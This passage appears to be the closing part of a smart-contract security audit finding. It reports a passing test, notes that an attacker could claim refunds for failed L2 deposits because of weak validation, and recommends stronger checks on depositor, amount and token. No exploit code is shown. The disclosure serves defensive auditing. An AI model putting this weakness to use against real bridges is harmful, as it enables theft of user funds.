Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 2.74ms

In addition, if an attacker can find a genuinely failed L2 deposit transaction, he can initiate a refund for it.

Tools Used

Manual

Recommended Mitigation Steps

Enhanced Verification: Increase the verification of key information such as the depositor, amount, and token type when processing refund requests.

Assessed type

Invalid Validation
